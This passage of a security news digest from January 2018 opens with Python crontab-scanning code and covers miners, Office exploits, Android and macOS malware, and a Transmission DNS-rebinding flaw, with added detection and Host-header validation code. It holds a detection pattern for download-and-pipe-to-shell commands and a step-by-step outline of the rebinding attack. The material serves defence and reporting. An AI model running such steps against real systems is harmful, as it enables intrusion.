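PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
FETCHES_ROBOTS = re.compile(r"robots\.txt")


def runs_hourly(schedule: str) -> bool:
    """True for the two common spellings of 'every hour' in cron: a fixed
    minute with '*' in the hour field, or a */60 minute step."""
    minute, hour = schedule.split()[:2]
    if hour != "*":
        return False
    return minute.isdigit() or minute == "*/60"


def analyse_crontab(text: str) -> List[Dict[str, object]]:
    """Return one finding per entry whose command downloads and executes
    remote content; each finding lists the reasons it was flagged."""
    findings: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue  # malformed entry; cron itself would reject it
        schedule, command = " ".join(fields[:5]), fields[5]
        reasons = []
        if DOWNLOADERS.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("downloads remote content and pipes it to a shell")
        if DOWNLOADERS.search(command) and FETCHES_ROBOTS.search(command):
            reasons.append("fetches a robots.txt file with a download tool")
        if reasons and runs_hourly(schedule):
            # Hourly re-download is what gives the operator a kill switch.
            reasons.append("re-runs every hour (re-download / kill switch pattern)")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in analyse_crontab(SAMPLE_CRONTAB):
        print(finding["schedule"], finding["command"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

On a live host the same function can be fed the output of `crontab -l` for each user and the contents of /etc/cron.d.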

The deployed malware – on all infected servers – is XMRig, a Monero miner that was used in September 2017 in an attack exploiting a vulnerability in Microsoft IIS 6.0, the webserver in Windows Server 2003 R2.

One of the domains used in the newly observed infection campaign is lochjol.com, which was previously used in an attack in 2013. That attack abused the Ruby on Rails vulnerability as well, and also had some features common with the current incident, but the researchers couldn’t determine further connections between the two, especially with their purpose seemingly different.


Threat Actors Quickly Adopt Effective Exploits
18.1.2018 securityweek Exploit
Cybercriminals and nation state groups were quick to adopt the most effective exploits last year, a new AlienVault report reveals.

Not only do the most effective exploits proliferate quickly between cybercriminals, but some of them remain popular for years after their initial discovery.

The top 10 list of exploits – by number of occurrences in vendor reports – is dominated by Microsoft Office and Microsoft Windows, data from AlienVault’s Open Threat Exchange (OTX) platform reveals. Adobe Flash, Microsoft .NET, and Android/Linux were also present on the list, with one exploit each.

The exploit to appear most often in vendor reports last year was CVE-2017-0199, a code execution bug affecting Microsoft Office. Detailed in April 2017, when it was already being abused in attacks, the vulnerability started being adopted almost immediately, and the trend continued toward the end of the year as well.

The popularity of this exploit continued to grow even after Microsoft released a patch. Originally abused with malicious Rich Text File (RTF) documents, the flaw was leveraged with PowerPoint Slide Show files by August, and threat actors continued to use it in this manner in the following months as well.

Some attackers combined multiple exploits to avoid detection, using CVE-2017-0199 together with CVE-2012-0158, an old Office flaw that is still exploited in many campaigns and which made it to the third position on AlienVault’s top 10 exploits for last year.

The second place went to CVE-2015-1641, an exploit that was already highly popular one year after it became public. Actors exploiting the vulnerability include the Patchwork cyberespionage group and cybercriminals located in Nigeria.

In addition to CVE-2017-0199, three other exploits discovered in 2017 were among the most reported by vendors, namely CVE-2017-0144, CVE-2017-0262, and CVE-2017-8759. A .NET zero-day, CVE-2017-8759 was patched in September, after it was abused to deliver the FinFisher malware to Russian-speaking individuals.

The only exploit targeting operating systems other than Windows that made it to AlienVault’s top 10 list is CVE-2013-6282, targeting a bug leveraged by Android malware to escalate privileges once installed on a victim’s phone.

A Windows 2000 flaw reported in 2001 was encountered the most by AlienVault’s customers, the company reports. Two vulnerabilities from 2017 made it to the top 10 list of exploits seen the most, namely CVE-2017-0144 and CVE-2017-5638 (an Apache Struts bug).

“This data-set is very large, and consists of many billions of security events. However the data is heavily biased towards “noisy” network based exploit attempts from worms and exploit scanners. This explains why we’re still recording ancient vulnerabilities from 2001 in this table,” AlienVault points out.


Briton Pleads Guilty to Running Malware Services
18.1.2018 securityweek Virus
Goncalo Esteves, a 24-year-old man from the United Kingdom, has pleaded guilty to charges related to creating and running services designed to help cybercriminals develop malware that would not be detected by antivirus products.

One of Esteves’ services was a website called reFUD.me. Created in February 2015, the site allowed cybercriminals to learn if their malware samples would be detected by antiviruses from various vendors. When it was shut down several months later, the service claimed that it had been used to conduct 1.2 million scans.

The man, known online as KillaMuvz, also created Cryptex, a tool that allowed malware developers to encrypt their files in an effort to make them more difficult to detect. Cryptex had been available since October 2011 and was improved over time.

Use of the reFUD and Cryptex tools was not free. For example, users had to pay $8 per month for the lite version of Cryptex or $90 for a lifetime license for Cryptex Reborn, which experts described as highly sophisticated.

Esteves and a woman were arrested in November 2015 as a result of an investigation conducted by Trend Micro and the UK’s National Crime Agency (NCA). Both services were shut down around the time of their arrest.

A local news site reported in March 2017 that Esteves had pleaded not guilty to four charges of computer misuse and one charge of obtaining money under the Proceeds of Crime Act 2002. The man insisted at the time that his software was designed for legitimate use.

However, the NCA announced this week that Esteves has pleaded guilty to two computer misuse charges and one count of money laundering. He will be sentenced on February 12.

Authorities said Esteves received roughly £32,000 ($44,000) for his services between 2011 and 2015. However, this only represents payments made through PayPal; the actual profit is likely much higher since he also accepted payment in bitcoins and Amazon vouchers.


Zyklon Malware Delivered via Recent Office Flaws
18.1.2018 securityweek Vulnerability
A piece of malware known as Zyklon has been delivered by cybercriminals using some relatively new vulnerabilities in Microsoft Office, FireEye reported on Wednesday.

Zyklon has been around since early 2016 and it allows attackers to conduct a wide range of malicious activities, including launching distributed denial-of-service (DDoS) attacks, logging keystrokes, stealing passwords, and mining cryptocurrency.

A recent campaign observed by FireEye has been aimed at organizations in the telecommunications, insurance and financial services sectors. The malware has been delivered as a ZIP archive attached to spam emails.

The ZIP file contains a specially crafted Word document that exploits one of three weaknesses in Microsoft Office to deliver a PowerShell script that downloads the final Zyklon payload from a remote server.

One of the vulnerabilities exploited by the malicious documents is CVE-2017-8759, a flaw patched by Microsoft in September 2017 after FireEye noticed that it had been exploited to deliver spyware. The security hole was later used by China-linked cyberspies to target organizations in the United States.

Another flaw exploited to deliver Zyklon is CVE-2017-11882, a 17-year-old vulnerability in the Equation Editor component that Microsoft patched in November. CVE-2017-11882 has been leveraged by Iranian cyberspies, the Cobalt hacking group, and others.

Cybercriminals have also abused the Dynamic Data Exchange (DDE) feature in Office to spread the malware. Russia-linked cyberspies and many other threat actors have abused DDE to deliver malware, which ultimately led to Microsoft disabling the feature in all versions of Word in an effort to prevent attacks.

If the malicious documents successfully exploit one of these weaknesses, they download a PowerShell script that injects code and fetches the final payload from a server.

The malware uses the Tor network to communicate with its command and control (C&C) server. Once a connection has been established, the attacker can instruct the malware to provide information about the infected system, launch DDoS attacks, mine cryptocurrency, and upload harvested data.

In addition to built-in functionality, Zyklon has several plugins that can be loaded for additional features. The plugins allow attackers to steal passwords from popular web browsers, FTP and email passwords, keys associated with video games, and software license keys.

The malware can also establish a Socks5 proxy on the infected machine, and it can hijack the clipboard in order to replace Bitcoin addresses copied by the victim with addresses owned by the attacker.


Researchers Earn $100,000 for Hacking Pixel Phone
18.1.2018 securityweek Vulnerability
A team of researchers has earned more than $100,000 from Google for an Android exploit chain that can be used to hack the company’s Pixel phone remotely simply by getting the targeted user to access a malicious website.

Google’s Pixel phone was the only device that was not hacked at last year’s Mobile Pwn2Own competition. However, researcher Guang Gong of Chinese security firm Qihoo 360 and his team did manage to find a couple of vulnerabilities that can be chained for a remote code injection exploit that works against Pixel and other Android smartphones.

The exploit relies on two vulnerabilities: CVE-2017-5116 and CVE-2017-14904. The former is a type confusion flaw in the V8 open-source JavaScript engine and it can be exploited for remote code execution in a sandboxed Chrome render process. Google patched this security hole in September with the release of Chrome 61.

The second vulnerability affects Android's libgralloc module and it can be exploited to escape the Chrome sandbox. This privilege escalation flaw was patched by Google in December with its monthly Android updates.

Combining the two vulnerabilities allows an attacker to inject arbitrary code into the system_server process by getting the targeted user to access a malicious URL in Chrome.

Gong and his team earned $105,000 for the exploit chain through the Android Security Rewards (ASR) program, and an additional $7,500 through the Chrome bug bounty program. This is the highest reward in the history of the ASR program, which is not surprising considering that it has been paid out for the first remote exploit chain since the ASR program was expanded last summer.

Google announced at the time that rewards for remote exploit chains or exploits leading to TrustZone or Verified Boot compromise increased to $200,000, and bounties for remote kernel exploits increased to $150,000.

Gong has published a guest post on Google’s security and Android developers blogs detailing both vulnerabilities and how the exploit chain works.


Cisco Patches Flaws in Email Security, Other Products
18.1.2018 securityweek Vulnerability
Cisco has patched several high severity vulnerabilities, including ones that allow privilege escalation and denial-of-service (DoS) attacks, in its Unified Customer Voice Portal (CVP), Email Security, and NX-OS products.

Software updates released by the company for its Email Security product address a privilege escalation vulnerability (CVE-2018-0095) that allows a local attacker with guest user permissions to gain root access.

The flaw affects the administrative shell of the Email Security Appliance (ESA) and the Content Security Management Appliance (SMA), and it’s caused by an incorrect networking configuration.

“An attacker could exploit this vulnerability by authenticating to the targeted device and issuing a set of crafted, malicious commands at the administrative shell. An exploit could allow the attacker to gain root access on the device,” Cisco said.

A different high severity vulnerability (CVE-2018-0086) was patched by Cisco in its CVP product. The security hole allows a remote, unauthenticated attacker to cause a DoS condition on the device by sending specially crafted SIP invite traffic to the targeted appliance.

A high severity DoS bug (CVE-2018-0102) has also been patched in the NX-OS network operating system. An unauthenticated attacker with access to the network can leverage the flaw to cause vulnerable devices to reload.

“An attacker could exploit this vulnerability by sending a pong request to an affected device from a location on the network that causes the pong reply packet to egress both a FabricPath port and a non-FabricPath port. An exploit could allow the attacker to cause a dual or quad supervisor virtual port-channel (vPC) to reload,” Cisco said in its advisory.

Cisco has also informed customers of two other vulnerabilities affecting NX-OS, including a DoS and a user account deletion issue, but these have been classified as medium severity and they have yet to be patched.

All of these vulnerabilities have been discovered by Cisco itself and there is no evidence of exploitation for malicious purposes.

Cisco released more than 20 advisories on Wednesday, but a majority describe medium severity flaws for which the company has yet to release any patches.


Google Brings Security Analytics to G Suite
18.1.2018 securityweek Security
Google this week announced security center for G Suite, a tool that brings together security analytics, actionable insights, and best practice recommendations from Google.

The new tool provides a snapshot of important security metrics in one place, including information on suspicious device activity. The security center can be used to gain visibility into how spam and malware are targeting users within an organization, as well as to access metrics to demonstrate security effectiveness.

Security analytics functions help security teams take advantage of insights into which users are being targeted by phishing, allowing them to prevent potential attacks. The security center also displays information on when Google Drive files trigger DLP rules, thus enabling admins to avoid data exfiltration.

Security recommendations, which are based on an analysis of the organization’s current security posture, are also available to admins through Security health. Tailored to the organization’s specific needs, these recommendations cover issues such as data storage, file sharing, and mobility and communications settings.

The Security health section also includes information on the number of organizational units for which a setting is enabled or disabled, and details on organizational units with risky configurations. This is where admins can monitor settings for Gmail, Google Drive, and devices, as well as whether two-step verification has been enabled for both users and admins.

Google is making the new features available to G Suite Enterprise customers within the Admin console, which should automatically appear to all qualifying customers within the next few days.

To get started, admins should sign in to their Google Admin console, then click Security, and access Dashboard for an overview of security metrics like spam volume, email authentication, and Drive sharing. By selecting Security health, they can get information on how security settings are configured for the domain and can receive suggestions based on best practices.


Skygofree — Powerful Android Spyware Discovered
17.1.2018 thehackernews Android

Security researchers have unveiled one of the most powerful and highly advanced Android spyware tools, which gives hackers full remote control of infected devices.
Dubbed Skygofree, the Android spyware has been designed for targeted surveillance, and it is believed to have been targeting a large number of users for the past four years.
Since 2014, the Skygofree implant has gained several novel features previously unseen in the wild, according to a new report published by Russian cybersecurity firm Kaspersky Labs.
The 'remarkable new features' include location-based audio recording using the device's microphone, the use of Android Accessibility Services to steal WhatsApp messages, and the ability to connect infected devices to malicious Wi-Fi networks controlled by attackers.


Skygofree is being distributed through fake web pages mimicking leading mobile network operators, most of which have been registered by the attackers since 2015—the year when the distribution campaign was most active, according to Kaspersky's telemetry data.
Italian IT Firm Behind Skygofree Spyware?

Researchers at Kaspersky Lab believe the hacker or hacking group behind this mobile surveillance tool has been active since 2014 and is based in Italy, home of the infamous 'Hacking Team', one of the world's bigger players in spyware trading.
"Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam," said the report.
Kaspersky found several Italian devices infected with Skygofree, which the firm described as one of the most powerful, advanced mobile implants it has ever seen.
Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to Rome-based technology company "Negg" in the spyware's code. Negg also specialises in developing and trading legal hacking tools.
Skygofree: Powerful Android Spyware Tool
Once installed, Skygofree hides its icon and starts background services to conceal further actions from the user. It also includes a self-protection feature, preventing services from being killed.


As of October last year, Skygofree became a sophisticated multi-stage spyware tool that gives attackers full remote control of the infected device using a reverse shell payload and a command and control (C&C) server architecture.
According to the technical details published by researchers, Skygofree includes multiple exploits to escalate privileges for root access, granting it the ability to execute the most sophisticated payloads on the infected Android devices.

One such payload allows the implant to execute shellcode and steal data belonging to other applications installed on the targeted devices, including Facebook, WhatsApp, Line, and Viber.
"There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features," the researchers said.
Skygofree’s command and control (C&C) server also allows attackers to capture pictures and videos remotely, seize call records and SMS, as well as monitor the users' geolocation, calendar events and any information stored in the device's memory.
Besides this, Skygofree can also record audio via the microphone when the infected device is in a specified location, and it has the ability to force the infected device to connect to compromised Wi-Fi networks controlled by the attacker, enabling man-in-the-middle attacks.
The spyware uses "the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages," Kaspersky said.
Kaspersky researchers also found a variant of Skygofree targeting Windows users, suggesting the authors' next area of interest is the Windows platform.
The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.


Warning: New Undetectable DNS Hijacking Malware Targeting Apple macOS Users
17.1.2018 thehackernews Apple

A security researcher has revealed details of a new piece of undetectable malware targeting Apple's Mac computers, reportedly the first macOS malware of 2018.
Dubbed OSX/MaMi, an unsigned Mach-O 64-bit executable, the malware is somewhat similar to DNSChanger malware that infected millions of computers across the world in 2012.
DNSChanger malware typically changes DNS server settings on infected computers, allowing attackers to route internet traffic through malicious servers and intercept sensitive information.
The malware first surfaced on the Malwarebytes forum, where a user posted a query regarding unknown malware that had infected his friend's computer and silently changed the DNS settings of the infected macOS system to the addresses 82.163.143.135 and 82.163.142.137.
After looking at the post, ex-NSA hacker Patrick Wardle analysed the malware and found that it is indeed a 'DNS Hijacker,' which also invokes security tools to install a new root certificate in an attempt to intercept encrypted communications as well.

"OSX/MaMi isn't particularly advanced - but does alter infected systems in rather nasty and persistent ways," Patrick said.
"By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle'ing traffic (perhaps to steal credentials, or inject ads)" or to insert cryptocurrency mining scripts into web pages.
Besides this, the OSX/MaMi macOS malware, which appears to be in its initial stage, also includes the following abilities, most of which are not currently activated in its version 1.1.0:
Take screenshots
Generate simulated mouse events
Perhaps persist as a launch item
Download and upload files
Execute commands
The motive, author(s) behind the malware, and how it is spreading are currently unknown.
However, Patrick believes that the attackers could be using lame methods like malicious emails, web-based fake security alerts/popups, or social-engineering type attacks to target Mac users.
To check whether your Mac is infected with MaMi malware, open the terminal or the System Preferences app and check your DNS settings, looking in particular for 82.163.143.135 and 82.163.142.137.
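The DNS check described above can be automated against the two indicator addresses the article names. This is an added example, not Patrick Wardle's code; it reads resolver configuration through `scutil --dns` (an assumption about the method, not the article's) and the sample output below is constructed.

```python
"""Check macOS resolver configuration for the DNS servers the article names
as OSX/MaMi indicators. Added example; parses `scutil --dns` output, and the
sample output here is constructed."""
import re
import subprocess
from typing import Dict, List, Set

# Indicator addresses quoted in the article above.
MAMI_DNS_SERVERS: Set[str] = {"82.163.143.135", "82.163.142.137"}

# Constructed sample of `scutil --dns` output with one hijacked resolver.
SAMPLE_SCUTIL_OUTPUT = """\
DNS configuration

resolver #1
  nameserver[0] : 192.168.1.1
  if_index : 6 (en0)
  flags    : Request A records
  reach    : 0x00020002 (Reachable,Directly Reachable Address)

resolver #2
  domain   : local
  options  : mdns
  timeout  : 5
  flags    : Request A records
  reach    : 0x00000000 (Not Reachable)
  order    : 300000

DNS configuration (for scoped queries)

resolver #1
  nameserver[0] : 82.163.143.135
  nameserver[1] : 82.163.142.137
  if_index : 6 (en0)
  flags    : Scoped, Request A records
  reach    : 0x00020002 (Reachable,Directly Reachable Address)
"""

RESOLVER_RE = re.compile(r"^resolver #(\d+)")
NAMESERVER_RE = re.compile(r"^\s*nameserver\[\d+\]\s*:\s*(\S+)")


def parse_scutil_dns(text: str) -> Dict[str, List[str]]:
    """Map each resolver block (keyed by section and number) to its nameservers.
    scutil prints a global section and a 'for scoped queries' section, and
    resolver numbering restarts in each, so the key carries the section."""
    resolvers: Dict[str, List[str]] = {}
    section, current = "global", None
    for line in text.splitlines():
        if line.startswith("DNS configuration"):
            section = "scoped" if "scoped" in line else "global"
            continue
        m = RESOLVER_RE.match(line)
        if m:
            current = f"{section}/resolver#{m.group(1)}"
            resolvers[current] = []
            continue
        m = NAMESERVER_RE.match(line)
        if m and current is not None:
            resolvers[current].append(m.group(1))
    return resolvers


def find_mami_indicators(text: str,
                         indicators: Set[str] = MAMI_DNS_SERVERS) -> Dict[str, List[str]]:
    """Return only the resolvers whose nameservers include an indicator address."""
    return {name: [s for s in servers if s in indicators]
            for name, servers in parse_scutil_dns(text).items()
            if any(s in indicators for s in servers)}


def check_live_system() -> Dict[str, List[str]]:
    """Run scutil on the local Mac and check the real configuration."""
    out = subprocess.run(["scutil", "--dns"], capture_output=True,
                         text=True, check=True).stdout
    return find_mami_indicators(out)


if __name__ == "__main__":
    hits = find_mami_indicators(SAMPLE_SCUTIL_OUTPUT)
    print("sample check:", hits if hits else "no indicator addresses found")
```

A hit only in the scoped section, as in the sample, would still matter: scoped resolvers serve queries bound to that interface.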

According to VirusTotal, a multi-engine antivirus scanner, none of the 59 antivirus engines it runs detects this malware at the moment, so you are advised to use a third-party tool such as a firewall that can detect and block outgoing traffic.
You can also install a free open-source firewall for macOS named 'LuLu,' created by Patrick and available on GitHub, which blocks suspicious traffic and prevents OSX/MaMi from stealing your data.


Fourth Fappening Hacker Admits to Stealing Celebrity Pics From iCloud Accounts
17.1.2018 thehackernews Apple

Almost three years after the massive leak of high-profile celebrities' nude photos, well known as "The Fappening" or "Celebgate" scandal, a fourth hacker has been charged with hacking into over 250 Apple iCloud accounts belonging to Hollywood celebrities.
George Garofano, 26, of North Branford, who had been arrested by the FBI, has been charged in federal court with violating the Computer Fraud and Abuse Act.
Garofano has admitted to illegally obtaining credentials for his victims' iCloud accounts using a phishing scheme, which eventually allowed him to steal personal information on his victims, including sensitive and private photographs and videos.
Among the celebrities whose nude photographs were posted online back in 2014 are Jennifer Lawrence, Kim Kardashian, Kirsten Dunst, and Kate Upton. Other female victims include American Olympic gold medallist Misty May Treanor and actors Alexandra Chando, Kelli Garner and Lauren O’Neil.
Between April 2013 and October 2014, Garofano sent phishing emails that pretended to be from Apple's security team to several celebrities, tricking them into providing their iCloud account credentials, which he then used to access their accounts illegally.
"Garofano admitted that he sent emails to victims that appeared to be from security accounts of Apple and encouraged the victims to send him their usernames and passwords, or to enter them on a third-party website, where he would later retrieve them," the Justice Department said.
Besides stealing victims' personal information, including sensitive and private photographs and videos, from their iCloud accounts using stolen credentials, Garofano, in some instances, also traded the stolen credentials, along with the materials he stole from the victims' accounts, with other individuals.
In a plea agreement signed Thursday in U.S. District Court in Los Angeles, Garofano agreed to plead guilty to one count of unauthorised access to a protected computer to obtain information, facing up to 5 years in prison.
Garofano is the fourth hacker charged in connection with the Celebgate incident. Emilio Herrera, 32, Edward Majerczyk, 28, and Ryan Collins, 36, pleaded guilty last year to being involved in the celebrity photo hack.
While Herrera is waiting for sentencing next month, Majerczyk was sentenced to nine months in prison and Collins was sentenced to 18 months last year.
The investigation into the Celebgate scandal is being conducted by the U.S. Federal Bureau of Investigation.


New Mirai Okiru Botnet targets devices running widely-used ARC Processors
17.1.2018 thehackernews BotNet

The cybersecurity threat landscape has never been more extensive and is most likely to grow exponentially in 2018.
Although the original creators of Mirai DDoS botnet have already been arrested and jailed, the variants of the infamous IoT malware are still in the game due to the availability of its source code on the Internet.
Security researchers have spotted a new variant of infamous Mirai IoT malware designed to hijack insecure devices that run on ARC embedded processors.
Until now, Mirai and its variants have been targeting CPU architectures—including x86, ARM, Sparc, MIPS, PowerPC and Motorola 6800—deployed in millions of Internet of Things (IoT) devices.

Dubbed Okiru, the new Mirai variant, first spotted by @unixfreaxjp of the MalwareMustDie team and reported by independent researcher Odisseus, is a new piece of ELF malware that targets ARC-based embedded devices running the Linux operating system.
"This is the FIRST TIME ever in the history of computer engineering that there is a malware for ARC CPU, & it is #MIRAI OKIRU!! Pls be noted of this fact, & be ready for the bigger impact on infection Mirai (specially #Okiru) to devices hasn't been infected yet," Odisseus tweeted.
The ARC (Argonaut RISC Core) embedded processor is the world's second-most-popular CPU core, shipped in more than 2 billion products every year, including cameras, mobile devices, utility meters, televisions, flash drives, automotive systems and Internet of Things devices.

However, this isn't the first Mirai botnet variant based on Linux ELF malware. Mirai also has another ELF-based variant, designed to target devices running MIPS and ARM processors.
It should also be noted that Okiru, which had previously also been referred to as the Satori IoT botnet (another Mirai variant discovered late last year), is "very different" from Satori despite sharing several characteristics, as explained in a Reddit thread.
Record-Breaking DDoS? The Calm Before The Storm
IoT devices are currently being deployed throughout homes, businesses, hospitals, and even cities (smart cities), but they are routinely being hacked and used as cyber weapons due to a lack of stringent security measures and insecure encryption mechanisms.
If you are unaware, the world's largest DDoS attack so far, at 1 Tbps, was launched from just 152,000 IoT devices infected with the Mirai botnet, and in a separate attack, just 100,000 devices took down the popular DynDNS service in late 2016.
Since Okiru has been ported to target a new range of millions of "expectedly insecure" devices running ARC processors, a DDoS attack generated by the Okiru botnet would probably be the biggest cyberattack ever.
"From this day, the landscape of #Linux #IoT infection will change. #ARC CPU has produced #IoT devices more than 1 billion per year. So these devices are what the hackers want to aim to infect #ELF #malware with their #DDoS cannons. It's a serious threat will be," Odisseus tweeted.
The fresh arrival of ARC-based IoT devices into botnet scheme will exponentially raise the number of insecure devices to an unprecedented size, making it easy for hackers to gain control over a large number of poorly configured and vulnerable IoT devices.


OnePlus Site’s Payment System Reportedly Hacked to Steal Credit Card Details
17.1.2018 thehackernews CyberCrime

This year's first piece of bad news for OnePlus users: a large number of OnePlus customers are reporting fraudulent credit card transactions after buying products from the Chinese smartphone manufacturer's official online store.
The claim initially surfaced on the OnePlus support forum over the weekend from a customer who said that two of his credit cards, both used on the company's official website, were suspected of fraudulent activity.
"The only place that both of those credit cards had been used in the last 6 months was on the Oneplus website," the customer wrote.
Later, a good number of users posted similar complaints on the OnePlus forums, Twitter and Reddit, saying they had also become victims of credit card fraud.
Many of the customers claimed that their credit cards had been compromised after they bought a new phone or some accessories directly from the OnePlus official website, indicating that the leak might have been through the company itself.
Cybersecurity firm Fidus also published a blog post detailing the alleged issue with the OnePlus website's on-site payment system. The firm suspected that the servers of the OnePlus website might have been compromised.

According to Fidus, OnePlus is currently conducting the transactions itself on-site, which means that all billing information along with all credit card details entered by its customers flow through the OnePlus official website and can be intercepted by attackers.
"Whilst the payment details are sent off to a third-party provider upon form submission, there is a window in which malicious code is able to siphon credit card details before the data is encrypted," Fidus wrote.
Fidus went on to clarify that their findings did not in any way confirm that the OnePlus website was breached; instead, they suggested the attacks might have come from the Magento eCommerce platform—which is used by OnePlus and is "a common platform in which credit card hacking takes place."
OnePlus has quickly responded to the issue on its forum, confirming that it does not store any credit card information on its website and all payment transactions are carried out through its PCI-DSS-compliant payment processing partner.
Only credit card-related information of users who have enabled the "save this card for future transactions" feature is stored on OnePlus' official servers, but even they are secured with a token mechanism.
"Our website is HTTPS encrypted, so it's very difficult to intercept traffic and inject malicious code, however we are conducting a complete audit," a company staffer using the name 'Mingyu' wrote.
The Chinese smartphone maker also confirms that purchases involving third-party services like PayPal are not affected.

OnePlus does not reveal much information on the incident but confirms that its official website is not affected by any Magento vulnerability.
The company confirms that oneplus.net was indeed built on the Magento eCommerce, but said since 2014, it has entirely been re-built using custom code, adding that "credit card payments were never implemented in Magento's payment module at all."
There are almost 100 claims of fraudulent credit card transactions on the OnePlus support forums. OnePlus has announced a formal investigation into the matter and advises affected users to contact their bank to reverse the payments.


Flaw in Popular Transmission BitTorrent Client Lets Hackers Control Your PC Remotely
17.1.2018 thehackernews
Virus

A critical vulnerability has been discovered in the widely used Transmission BitTorrent app that could allow hackers to remotely execute malicious code on BitTorrent users' computers and take control of them.
The vulnerability has been uncovered by Google's Project Zero vulnerability reporting team, and one of its researchers Tavis Ormandy has also posted a proof-of-concept attack—just 40 days after the initial report.
Usually, the Project Zero team discloses vulnerabilities either 90 days after reporting them to the affected vendors or once the vendor has released a patch.
However, in this case, the Project Zero researchers disclosed the vulnerability 50 days prior to the actual time limit because Transmission developers failed to apply a ready-made patch provided by the researchers over a month ago.
"I'm finding it frustrating that the transmission developers are not responding on their private security list, I suggested moving this into the open so that distributions can apply the patch independently. I suspect they won't reply, but let's see," Ormandy said in a public report published Tuesday.
Proof-of-Concept Exploit Made Publicly Available
The PoC attack published by Ormandy exploits a specific Transmission function that lets users control the BitTorrent app with their web browser.
Ormandy confirmed his exploit works on Chrome and Firefox on Windows and Linux (Fedora and Ubuntu) and believes that other browsers and platforms are also vulnerable to the attack.
The Transmission BitTorrent app works on a client-server architecture: users install a daemon service on their system and then access a web-based interface for it locally through their browser.
The browser-based interface then drives the daemon, which does the actual downloading and uploading of files, through JSON-RPC requests.
Ormandy found that a technique known as a DNS rebinding attack could be used to exploit this setup, allowing any malicious website the user visits to execute code on the user's computer remotely with the help of the installed daemon service.
Here's How the Attack Works:
The loophole resides in the fact that services installed on localhost can be manipulated to interact with third-party websites.
"I regularly encounter users who do not accept that websites can access services on localhost or their intranet," Ormandy wrote in a separate post, which includes the patch.
"These users understand that services bound to localhost are only accessible to software running on the local machine and that their browser is running on the local machine—but somehow believe that accessing a website "transfers" execution somewhere else. It does not work like that, but this is a common source of confusion."
Attackers can exploit this loophole by simply creating a DNS name they're authorised to communicate with and then making it resolve to the vulnerable computer's localhost address. Here's how the attack works:

A user visits a malicious site (http://attacker.com), which contains an iframe to a subdomain controlled by the attacker.
The attacker configures their DNS server to respond alternately with 127.0.0.1 and 123.123.123.123 (an address controlled by the attacker), with a very low TTL.
When the browser resolves the subdomain to 123.123.123.123, the attacker's server serves HTML that waits for the DNS entry to expire (or forces it out by flooding the cache with lookups); once the name resolves to 127.0.0.1 instead, the page has permission to read and set headers on requests to the local daemon.
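The standard defence for a localhost service against this sequence is to validate the Host header: after rebinding, the attacker's page reaches the daemon at 127.0.0.1, but the browser still sends the attacker's hostname in Host. The code below is an added example of that check, not Transmission's code or Ormandy's patch; the RPC port 9091, the allowlist and the request data are constructed.

```python
"""Host-header validation for a localhost RPC daemon against DNS rebinding.

Added example, not Transmission's code or Ormandy's patch. A daemon that only answers
for names it is legitimately reached by refuses the rebound request, whatever the
attacker's subdomain currently resolves to. Port and request data are constructed.
"""
import ipaddress

RPC_PORT = 9091  # assumed port the local daemon listens on
# Names under which the daemon may legitimately be addressed (constructed allowlist).
TRUSTED_HOSTS = {"localhost", "127.0.0.1", "::1"}


def split_host_port(host_header):
    """Split a Host header into (hostname, port or None); supports [IPv6]:port.

    Raises ValueError on malformed input so the caller treats it as untrusted.
    """
    value = host_header.strip()
    if value.startswith("["):                      # bracketed IPv6 literal
        end = value.find("]")
        if end == -1:
            raise ValueError("unterminated IPv6 literal")
        host, rest = value[1:end], value[end + 1:]
        if rest and not rest.startswith(":"):
            raise ValueError("garbage after IPv6 literal")
        port = rest[1:] if rest else ""
    else:
        host, _, port = value.partition(":")
    if not host:
        raise ValueError("empty host")
    if port and not port.isdigit():
        raise ValueError("non-numeric port")
    return host.lower(), (int(port) if port else None)


def is_trusted_host(host_header, trusted=TRUSTED_HOSTS, rpc_port=RPC_PORT):
    """True if the Host header names this daemon by a trusted name on its own port."""
    try:
        host, port = split_host_port(host_header)
    except ValueError:
        return False
    if port is not None and port != rpc_port:
        return False
    if host in trusted:
        return True
    try:                                            # any other loopback literal, e.g. 127.0.0.2
        return ipaddress.ip_address(host).is_loopback
    except ValueError:                              # a DNS name that is not on the allowlist
        return False


def handle_rpc_request(headers):
    """Return the HTTP status a hardened daemon gives a request with these headers.

    421 Misdirected Request is returned for a missing or untrusted Host header, so the
    attacker's page gets nothing to read even after the name has been rebound.
    """
    host = next((v for k, v in headers.items() if k.lower() == "host"), None)
    if host is None or not is_trusted_host(host):
        return 421
    return 200


def rebinding_sequence():
    """The requests the daemon sees during the attack described above (constructed)."""
    return [
        handle_rpc_request({"Host": f"localhost:{RPC_PORT}"}),        # legitimate web UI
        handle_rpc_request({"Host": f"[::1]:{RPC_PORT}"}),            # legitimate, IPv6
        # After the TTL expires the attacker's subdomain resolves to 127.0.0.1; the request
        # arrives at the daemon but still carries the attacker's name in Host.
        handle_rpc_request({"Host": f"sub.attacker.example:{RPC_PORT}"}),
        handle_rpc_request({"Host": "127.0.0.1:80"}),                 # right address, wrong port
        handle_rpc_request({}),                                        # HTTP/1.0 without Host
    ]
```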
Ormandy said the vulnerability (CVE-2018-5702) was the "first of a few remote code execution flaws in various popular torrent clients," though he did not name the other torrent apps due to the 90-day disclosure timeline.
A fix is expected to be released as soon as possible, a development official with Transmission told ArsTechnica, without specifying an actual date.


LeakedSource Founder Arrested for Selling 3 Billion Stolen Credentials
17.1.2018 thehackernews CyberCrime

Canadian authorities have arrested and charged an Ontario man for operating a website that collected 'stolen' personal identity records and credentials from some three billion online accounts and sold them for profit.
